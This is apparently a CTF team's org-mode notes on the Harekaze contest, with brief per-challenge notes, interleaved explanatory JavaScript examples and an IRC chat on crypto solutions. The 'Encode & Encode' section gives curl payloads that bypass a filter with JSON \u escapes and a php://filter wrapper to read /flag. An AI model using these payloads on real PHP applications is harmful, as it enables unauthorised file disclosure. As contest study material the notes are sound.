* DONE Welcome [Misc 10]

Solved: wasamasa

- Copy and paste that flag!

* DONE scramble [Reversing 100]

Solved: Oblivion

- ELF binary messing around with program memory
- It decompiles in Ghidra, but it's all gibberish
- Oblivion solved it with some code

* DONE ONCE UPON A TIME [Crypto 100]

Solved: WTFH4X

- Cryptosystem doing matrix multiplication with some randomization
- Given the length of the output, there are four possible ways it has
 been created (since it's two parts and randomization allows each to
 happen two ways)
- I have no idea how to solve linear algebra problems :(

* DONE Baby ROP [Pwn 100]

Solved: semchapeu

* TODO The Steganography Generator [Reversing 200]

- Decompiles cleanly
- The Java code mutates certain pixels of the image
- It uses a bytestream composed of some magic bytes followed by the
 flag

* DONE Twenty-five [Crypto 100]

Solved: wasamasa

- Goal: Translate crypto.txt to valid perl code
- I did forgo frequency analysis and instead looked for
 unusual/unique words among the reserved keywords list
- =qq= is a good start, from then on one can guess =qx= and continue
 until figuring out all letters
- Searching reserved.txt for patterns like =^a..b$= is the way
- Change the code to =print($text);= to see your progress and comment
 out =eval($text);=
- Evaluating the fully translated code will print the flag
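As an added example (not part of these notes and not the challenge's files), a small JavaScript helper that does what the bullets above describe: keep a partial cipher-to-plain letter map, print the partially translated text instead of evaluating it, and search a keyword list with the =^a..b$=-style pattern for a given cipher word. The keyword list and the ciphertext are constructed for the demo; the Atbash key is only a reproducible stand-in for the unknown substitution, and the real reserved.txt and crypto.txt are not reproduced here.

```javascript
// Added example, not from the notes: incremental monoalphabetic substitution
// solving as described for "Twenty-five". Word list and ciphertext are
// constructed; the Atbash key stands in for the unknown real key.

// Constructed stand-in for reserved.txt: Perl keywords, one per entry.
const RESERVED = ["eval", "join", "length", "my", "print", "qq", "qw", "qx", "return", "split", "sub"];

// Atbash (a<->z, b<->y, ...) as the demo key; only lowercase letters are substituted.
const ATBASH = Object.fromEntries([...Array(26)].map((_, i) =>
  [String.fromCharCode(97 + i), String.fromCharCode(122 - i)]));

function encipher(text, key) {
  return text.replace(/[a-z]/g, (c) => key[c]);
}

// Constructed sample "crypto.txt": a short Perl snippet enciphered with the demo key.
const SAMPLE_CIPHERTEXT = encipher("my $t = qq(flag); print(length($t));", ATBASH);

// Apply a partial cipher->plain key; unknown letters show as '?' so progress
// is visible, like printing $text instead of eval-ing it.
function translate(text, key) {
  return text.replace(/[a-z]/g, (c) => key[c] ?? "?");
}

// Build the pattern the notes describe (e.g. ^a..b$) for one cipher word:
// known letters become literals, unknown letters become '.'.
function patternFor(cipherWord, key) {
  return "^" + [...cipherWord].map((c) => key[c] ?? ".").join("") + "$";
}

// Candidate plaintexts for a cipher word: match the pattern, then drop any
// candidate that breaks the bijection (a plain letter already assigned to
// another cipher letter cannot be reused, and repeated cipher letters must
// map to the same plain letter while distinct ones must not collide).
function candidates(cipherWord, key, wordList = RESERVED) {
  const re = new RegExp(patternFor(cipherWord, key));
  const used = new Set(Object.values(key));
  return wordList.filter((w) => {
    if (!re.test(w)) return false;
    const local = {};
    for (let i = 0; i < w.length; i++) {
      const c = cipherWord[i], p = w[i];
      if (key[c] !== undefined) continue;            // already enforced by the regex
      if (used.has(p)) return false;                 // plain letter taken elsewhere
      if (local[c] !== undefined && local[c] !== p) return false;
      local[c] = p;
    }
    const plains = Object.values(local);
    return new Set(plains).size === plains.length;   // distinct cipher letters, distinct plains
  });
}

// Commit a guess: map every letter of the cipher word to the plain word.
function learn(key, cipherWord, plainWord) {
  const next = { ...key };
  [...cipherWord].forEach((c, i) => { next[c] = plainWord[i]; });
  return next;
}

// Walk the sample the way the notes describe: the doubled two-letter token is
// guessed as qq, then every cipher word with exactly one consistent candidate
// is committed, repeating until nothing new is learned.
function solveSample() {
  const words = SAMPLE_CIPHERTEXT.match(/[a-z]+/g);
  let key = learn({}, words.find((w) => w.length === 2 && w[0] === w[1]), "qq");
  const steps = [];
  let progress = true;
  while (progress) {
    progress = false;
    for (const w of words) {
      if ([...w].every((c) => key[c] !== undefined)) continue;  // fully known already
      const cands = candidates(w, key);
      if (cands.length === 1) {
        key = learn(key, w, cands[0]);
        steps.push(`${w} -> ${cands[0]}`);
        progress = true;
      }
    }
  }
  return { key, steps, text: translate(SAMPLE_CIPHERTEXT, key) };
}
```

Letters that never occur in a keyword (here the argument of =qq=) stay as =?= in the translated text and have to be filled in from context, which is the "continue until figuring out all letters" part of the notes.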

* DONE Encode & Encode [Web 100]

Solved: wasamasa

- The key insight here is that the check is done before JSON decoding
- So, you can enter something not matching the filter, but which
 decodes into something exfiltrating the flag
- A second bypass is required, for this you can use the same trick to
 invoke a PHP wrapper that filters output
- I picked =php://filter= to ROT13-encode the flag on its way out...

#+BEGIN_SRC shell-script
# Baseline: a page the filter accepts
curl -i -H 'Content-Type: application/json' --data '{"page": "./index.html "}' http://problem.harekaze.com:10001/query.php
# Asking for the flag directly is caught by the filter
curl -i -H 'Content-Type: application/json' --data '{"page": "/flag"}' http://problem.harekaze.com:10001/query.php
# JSON \u escape: the raw body passes the filter, the decoded value is /flag
curl -i -H 'Content-Type: application/json' --data '{"page": "/\u0066lag"}' http://problem.harekaze.com:10001/query.php
# Same trick on the scheme so php://filter can ROT13-encode the flag on its way out
curl -i -H 'Content-Type: application/json' --data '{"page": "php\u003a//filter/read=string.rot13/resource=/\u0066lag"}' http://problem.harekaze.com:10001/query.php
#+END_SRC
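As an added example (not the challenge's PHP source), a JavaScript model of the ordering bug the bullets describe: a check run over the raw JSON text never sees the decoded string, so JSON =\u= escapes slip past it. That the real check was a substring denylist with these particular terms is an assumption; the notes only say the check happens before decoding. The request bodies are constructed to mirror the curl payloads above.

```javascript
// Added example, not the challenge's code: "filter, then decode" beside the
// two orderings that close the gap. DENYLIST and ALLOWED_PAGES are assumed
// values for the demo, not the challenge's real configuration.
const DENYLIST = ["flag", "php:"];
const ALLOWED_PAGES = new Set(["index.html", "about.html"]);

// Decode the JSON body and pull out the "page" string, or null if absent/invalid.
function decodePage(rawBody) {
  try {
    const page = JSON.parse(rawBody).page;
    return typeof page === "string" ? page : null;
  } catch {
    return null;
  }
}

// Vulnerable order: the denylist sees the raw JSON text, where "\u0066lag"
// does not yet contain "flag"; the decoded value is then used unchecked.
function filterThenDecode(rawBody) {
  if (DENYLIST.some((t) => rawBody.includes(t))) return null;
  return decodePage(rawBody);
}

// Correct order, same denylist: decode first so escapes are resolved, then check.
function decodeThenDenylist(rawBody) {
  const page = decodePage(rawBody);
  if (page === null || DENYLIST.some((t) => page.includes(t))) return null;
  return page;
}

// Stronger: decode first, then accept only exact names from an allowlist,
// which also shuts out stream wrappers such as php://filter however they are spelled.
function decodeThenAllowlist(rawBody) {
  const page = decodePage(rawBody);
  return page !== null && ALLOWED_PAGES.has(page) ? page : null;
}

// Constructed request bodies, spelled like the curl payloads in the notes.
const REQUESTS = {
  plain: '{"page": "/flag"}',
  escaped: '{"page": "/\\u0066lag"}',
  wrapper: '{"page": "php\\u003a//filter/read=string.rot13/resource=/\\u0066lag"}',
  legit: '{"page": "index.html"}',
};

// Run every body through the three variants: [vulnerable, fixed order, allowlist].
function compare() {
  const out = {};
  for (const [name, body] of Object.entries(REQUESTS)) {
    out[name] = [filterThenDecode(body), decodeThenDenylist(body), decodeThenAllowlist(body)];
  }
  return out;
}
```

Reordering alone already blocks both payloads, but a denylist still has to anticipate every scheme and spelling; validating the decoded value against an allowlist is the check that does not depend on guessing what an attacker will encode.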

* DONE Baby ROP 2 [Pwn 200]

Solved: semchapeu

* TODO show me your private key [Crypto 200]

- I don't understand ECC at all
- I should learn some sagemath

* TODO Admin's Product key [Reversing 200]

- No clue

* TODO Login System [Pwn 200]

- semchapeu is taking this one on

* TODO Easy Notes [Web 200]

- Lots of carefully written PHP
- No obvious way to change the session contents
- I've tried to leak the environment variables instead, no luck either
- Maybe it's =$type=?

* DONE [a-z().] [Misc 200]

Solved: WTFH4X

- This one's terrible
- 1337 is 7*191
- You can obtain numbers by using =length= on an array or string
- You can obtain properties without uppercase letters
- You can call functions with 0 or 1 arguments
- I got some numbers out of this, but nothing close
- Crazy idea: Obtain running time and hope it matches eventually
- Crazy idea: Reverse DNS on a numerically represented IP address
- Neither will work because the VM namespace is seriously limited
- There are some top-level functions with short names like
 =console.log.name=
- Candidates can be obtained by pressing the tab key twice inside a
 =node= REPL and testing against the VM
- You can build an algebra by using =concat= on strings and =repeat=
 on lengths
- This together with a short enough primitive for 8 and 7 gives you
 the following term: 7*((8+8+7)*8+7)
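As an added example (not the solver used during the CTF), the term above realised in JavaScript with nothing but lowercase letters, dots and parentheses: method names supply the small lengths (=console.log.name= is ="log"=, as noted above), =concat= adds lengths and =repeat= multiplies them. That =console.warn= is reachable in the challenge VM is an assumption; in plain Node it is, and its name is ="warn"=.

```javascript
// Added example, not the challenge's own solution: 7*((8+8+7)*8+7) = 1337
// built from string lengths only. Assumes console.log and console.warn
// (names "log" and "warn") are reachable; console.log.name is from the notes.
const SEVEN = "console.log.name.concat(console.warn.name)";   // "logwarn",  length 7
const EIGHT = "console.warn.name.concat(console.warn.name)";  // "warnwarn", length 8

// The algebra from the notes: concat adds lengths, repeat multiplies them.
const add = (a, b) => `${a}.concat(${b})`;
const mul = (a, b) => `${a}.repeat(${b}.length)`;

// 7*((8+8+7)*8+7), then read the length off the final string.
const EXPR = mul(add(mul(add(add(EIGHT, EIGHT), SEVEN), EIGHT), SEVEN), SEVEN) + ".length";

// The challenge's character filter as its title states it: [a-z().] only.
function withinCharset(expr) {
  return /^[a-z().]+$/.test(expr);
}

// Evaluate a candidate in this process (stands in for sending it to the VM).
function evaluate(expr) {
  return Function(`return (${expr});`)();
}

function solve() {
  return { expr: EXPR, ok: withinCharset(EXPR), value: evaluate(EXPR) };
}
```

The intermediate string grows to 1337 characters, which is harmless here but is why a short primitive for 7 and 8 matters: every extra factor in the term multiplies the string that has to be built before =.length= is read.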

* DONE Now We Can Play!! [Crypto 200]

Solved: WTFH4X

- Some funky crypto exchange

* TODO One Quadrillion [Crypto 200]

- Some unreadable hashing function

* TODO Harekaze Note [Pwn 300]

- semchapeu is taking this one on

* DONE Avatar Uploader 1 [Misc 100]

Solved: wasamasa

- The flag can be obtained by triggering an error path in the uploader
- It looks as if you just need a mangled PNG file
- This code gives you the flag:

#+BEGIN_SRC shell-script
# Make a valid 1x1 PNG with ImageMagick (-size has to come before xc: to take effect)
convert -size 1x1 xc:red 1x1.png
# Keep only the first 20 bytes: the PNG signature plus a truncated IHDR chunk, which trips the error path
head -c20 1x1.png > broken.png
#+END_SRC

* TODO Avatar Uploader 2 [Web 300]

- The flag is in the file system, so some exfiltration is required

* TODO Ramen [Pwn 400]

- I'll let semchapeu deal with this

* TODO SQLite Voting [Web 350]

- SQL injection, but not as we know it
- The most severe restriction is no whitespace, followed by none of
 the usual characters
- You only get a binary response back

* Other

08:22 < WTFH4X> once upon a time:
08:22 < wasa> you can write it into a file
08:23 < WTFH4X> takenoko is just matrix multiplication % 251 -> so multiply encrypted flag by modular inverse of m2
08:23 < WTFH4X> from left side and from right side, take the one that gives printable flag
08:24 < WTFH4X> now we can play:
08:24 < WTFH4X> pass c1, c2 back to the server
08:25 < WTFH4X> you get back: pow(3, randint(2**16, 2**17), p) * flag % p
08:25 < WTFH4X> just brute all values of that random
08:26 < WTFH4X> for i in xrange(2**16, 2**17):  x = c * inverse(pow(3, i, p), p) % p; if is_printable(x): print(x)
08:26 < WTFH4X> smth like that